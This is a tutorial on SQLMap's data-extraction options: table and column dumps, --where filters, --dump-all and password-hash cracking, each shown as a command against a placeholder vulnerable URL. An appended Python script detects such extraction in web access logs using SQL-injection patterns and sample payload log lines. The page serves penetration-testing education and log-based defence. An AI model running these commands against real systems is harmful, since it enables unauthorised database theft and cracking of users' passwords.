Data Extraction Techniques

Learn how to extract data from databases using SQLMap

After identifying the database structure, you can extract data from specific tables and columns of interest.

Dumping Table Data (--dump)

To extract all data from a specific table:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T table_name --dump

This command retrieves all records from the specified table. For large tables, SQLMap will ask if you want to retrieve all entries or a subset.

Dumping Specific Columns (-C)

To extract data from specific columns only:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T table_name -C "username,password,email" --dump

This is useful when you're only interested in certain columns, especially in tables with many columns or large amounts of data.

Conditional Data Extraction (--where)

To extract records that match specific criteria:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T users -C "username,password" --dump --where "username='admin'"

This allows you to filter the data based on specific conditions, similar to a SQL WHERE clause.

Extracting a Range of Records (--start and --stop)

For large tables, you can extract a specific range of records:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T users --dump --start 1 --stop 100

This retrieves only records 1 through 100, which is useful for paginating through large datasets.

Dumping All Databases (--dump-all)

To extract data from all tables in all databases:

sqlmap -u "http://www.example.com/vuln.php?id=1" --dump-all

Password Cracking (--passwords)

SQLMap can attempt to identify and crack password hashes:

sqlmap -u "http://www.example.com/vuln.php?id=1" --passwords

This command:

  1. Identifies tables that might contain password hashes
  2. Extracts the hashes
  3. Attempts to crack them using a dictionary attack or brute force

You can also specify a custom wordlist with --passwords-file=/path/to/wordlist.txt.

Optimizing Data Extraction

For large databases, consider these optimization techniques:

  • Use --threads to speed up data extraction
  • Use --dump-format=CSV to output data in a more manageable format
  • Use --binary-fields to specify which fields contain binary data
  • Use --hex to retrieve data in hexadecimal format for binary fields

These options can significantly improve the efficiency of data extraction, especially for large databases with complex data types.
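
Seen from the defending side, the row-by-row extraction described above tends to leave a recognizable trail in web server access logs: one client sending many SQL-bearing requests to a single parameter while a row offset keeps advancing. The Python detection below is an added example, not part of the original page or of sqlmap. It assumes combined-format logs, GET-based injection visible in the query string, and MySQL-style "LIMIT n,1" offsets; the function name find_extraction, the MIN_HITS threshold and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = '''\
203.0.113.7 - - [10/May/2024:10:00:01 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20username%2Cpassword%20FROM%20users%20LIMIT%200%2C1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [10/May/2024:10:00:01 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20username%2Cpassword%20FROM%20users%20LIMIT%201%2C1 HTTP/1.1" 200 498 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [10/May/2024:10:00:02 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20username%2Cpassword%20FROM%20users%20LIMIT%202%2C1 HTTP/1.1" 200 505 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.20 - - [10/May/2024:10:00:03 +0000] "GET /vuln.php?id=7 HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
198.51.100.20 - - [10/May/2024:10:00:09 +0000] "GET /search.php?q=select+a+plan+from+the+union+catalog HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')
SQLI = re.compile(r"union\s+(?:all\s+)?select|information_schema|select\s.+\sfrom\s", re.I)
LIMIT = re.compile(r"limit\s+(\d+)\s*,\s*1\b", re.I)
MIN_HITS = 3  # assumed threshold; tune against your own traffic baseline


def find_extraction(log_text):
    """Return {(client_ip, path): {"hits", "offsets", "tool_ua"}} for flagged clients."""
    seen = defaultdict(lambda: {"hits": 0, "offsets": set(), "tool_ua": False})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, agent = m.groups()
        path, _, query = target.partition("?")
        query = unquote_plus(query)  # decode %20, %2C and '+' before matching
        if not SQLI.search(query):
            continue
        entry = seen[(ip, path)]
        entry["hits"] += 1
        entry["offsets"].update(int(n) for n in LIMIT.findall(query))
        # The User-Agent is client-controlled, so it is recorded as context only.
        entry["tool_ua"] |= agent.lower().startswith("sqlmap/")
    # Flag only repeated SQL-bearing requests to one path whose LIMIT offset
    # keeps advancing; a single keyword hit (the /search.php line) is not enough.
    return {
        key: e for key, e in seen.items()
        if e["hits"] >= MIN_HITS and len(e["offsets"]) >= MIN_HITS
    }


if __name__ == "__main__":
    for (ip, path), e in find_extraction(SAMPLE_LOG).items():
        print(ip, path, e["hits"], sorted(e["offsets"]), e["tool_ua"])
```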